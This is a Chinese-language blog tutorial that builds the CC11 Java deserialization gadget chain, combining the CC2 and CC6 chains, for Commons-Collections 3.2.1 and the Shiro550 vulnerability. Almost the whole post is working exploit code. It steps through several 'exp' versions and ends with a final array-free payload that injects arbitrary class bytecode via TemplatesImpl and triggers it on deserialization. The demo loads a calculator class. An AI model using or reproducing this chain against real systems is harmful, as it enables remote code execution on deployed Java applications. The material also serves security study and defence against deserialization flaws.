大家好,欢迎来到IT知识分享网。
前言
这条链子的主要作用是为了可以在 Commons-Collections 3.2.1 版本中使用,而且还是无数组的方法。这条链子适用于 Shiro550漏洞
CC11链子流程
CC2 + CC6的结合体
CC2
TemplatesImpl.newTransformer() --> defineClass->newInstance 调用 TemplatesImpl类的 newTransformer方法
TemplatesImpl templates = new TemplatesImpl(); templates.newTransformer(); import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import java.lang.reflect.Field; public class C11 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> tc = templates.getClass(); Field name = tc.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"a"); } } import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; public class C11 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> tc = templates.getClass(); Field name = tc.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"a"); Field bytecodes = tc.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true); byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class")); byte[][] codes = {
eval}; bytecodes.set(templates,codes); //在readObject中找,因为该字段不身不参加序列化 Field tfactory = tc.getDeclaredField("_tfactory"); tfactory.setAccessible(true); tfactory.set(templates,new TransformerFactoryImpl()); //初始化加载类 templates.newTransformer(); } } CC6
CC6的链子流程:
xxx.readObject() HashMap.put() HashMap.hash() TiedMapEntry.hashCode() TiedMapEntry.getValue() LazyMap.get() ChainedTransformer.transform() InvokerTransformer.transform() Runtime.exec() 尾部链
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.HashMap; import java.util.Map; public class C11 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> tc = templates.getClass(); Field name = tc.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"a"); Field bytecodes = tc.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true); byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class")); byte[][] codes = {
eval}; bytecodes.set(templates,codes); Field tfactory = tc.getDeclaredField("_tfactory"); tfactory.setAccessible(true); tfactory.set(templates,new TransformerFactoryImpl()); //初始化加载类 // templates.newTransformer(); //CC6的开始 Transformer[] transformers = {
new ConstantTransformer(templates), new InvokerTransformer("newTransformer",null,null) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); Map lazymap = LazyMap.decorate(new HashMap<>(),chainedTransformer); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,null); tiedMapEntry.getValue(); } } 结合入口链
xxx.readObject() HashMap.put() --自动调用--> 后续利用链.hashCode() 所以我们可以构造exp代码:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.HashMap; import java.util.Map; public class C11 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> tc = templates.getClass(); Field name = tc.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"a"); Field bytecodes = tc.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true); byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class")); byte[][] codes = {
eval}; bytecodes.set(templates,codes); Field tfactory = tc.getDeclaredField("_tfactory"); tfactory.setAccessible(true); tfactory.set(templates,new TransformerFactoryImpl()); //初始化加载类 // templates.newTransformer(); Transformer[] transformers = {
new ConstantTransformer(templates), new InvokerTransformer("newTransformer",null,null) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); Map lazymap = LazyMap.decorate(new HashMap<>(),chainedTransformer); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,null); // tiedMapEntry.getValue(); hashCode代替 lazymap.put(tiedMapEntry,null); } } 解决只有反序列化执行命令
如果我们在序列化执行命令前,修改这行代码的chainedTransformer,它就不能执行了命令了
Map lazymap = LazyMap.decorate(new HashMap<>(),chainedTransformer); -->修改为 Map lazymap = LazyMap.decorate(new HashMap<>(),new ConstantTransformer(1)); Class<LazyMap> lazyMapClass = LazyMap.class; Field factory = lazyMapClass.getDeclaredField("factory"); factory.setAccessible(true); factory.set(lazymap,chainedTransformer); lazymap.remove(null); CC6+CC2有数组最终exp代码
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.HashMap; import java.util.Map; public class C11 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> tc = templates.getClass(); Field name = tc.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"a"); Field bytecodes = tc.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true); byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class")); byte[][] codes = {
eval}; bytecodes.set(templates,codes); Field tfactory = tc.getDeclaredField("_tfactory"); tfactory.setAccessible(true); tfactory.set(templates,new TransformerFactoryImpl()); //初始化加载类 // templates.newTransformer(); Transformer[] transformers = {
new ConstantTransformer(templates), new InvokerTransformer("newTransformer",null,null) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); HashMap<Object, Object> hashMap = new HashMap<>(); Map lazymap = LazyMap.decorate(hashMap,new ConstantTransformer(1)); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,null); // tiedMapEntry.getValue(); hashCode代替 lazymap.put(tiedMapEntry,null); lazymap.remove(null); Class<LazyMap> lazyMapClass = LazyMap.class; Field factory = lazyMapClass.getDeclaredField("factory"); factory.setAccessible(true); factory.set(lazymap,chainedTransformer); serialize(hashMap); unserialize("ser.bin"); } public static void serialize(Object obj) throws IOException{
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename)); Object obj = ois.readObject(); return obj; } } CC11无数组exp构造
修改有数组的CC11代码如下:
Transformer[] transformers = {
new ConstantTransformer(templates), new InvokerTransformer("newTransformer",null,null) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); --->修改为 InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null); 修改的代码:
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,templates); // tiedMapEntry.getValue(); hashCode代替 lazymap.put(tiedMapEntry,null); lazymap.remove(templates); Class<LazyMap> lazyMapClass = LazyMap.class; Field factory = lazyMapClass.getDeclaredField("factory"); factory.setAccessible(true); factory.set(lazymap,invokerTransformer); 最终exp代码:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.HashMap; import java.util.Map; public class C11 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> tc = templates.getClass(); Field name = tc.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"a"); Field bytecodes = tc.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true); byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class")); byte[][] codes = {
eval}; bytecodes.set(templates,codes); Field tfactory = tc.getDeclaredField("_tfactory"); tfactory.setAccessible(true); tfactory.set(templates,new TransformerFactoryImpl()); //初始化加载类 // templates.newTransformer(); InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null); HashMap<Object, Object> hashMap = new HashMap<>(); Map lazymap = LazyMap.decorate(hashMap,new ConstantTransformer(1)); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,templates); // tiedMapEntry.getValue(); hashCode代替 lazymap.put(tiedMapEntry,null); lazymap.remove(templates); Class<LazyMap> lazyMapClass = LazyMap.class; Field factory = lazyMapClass.getDeclaredField("factory"); factory.setAccessible(true); factory.set(lazymap,invokerTransformer); serialize(hashMap); unserialize("ser.bin"); } public static void serialize(Object obj) throws IOException{
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename)); Object obj = ois.readObject(); return obj; } } 免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/136804.html
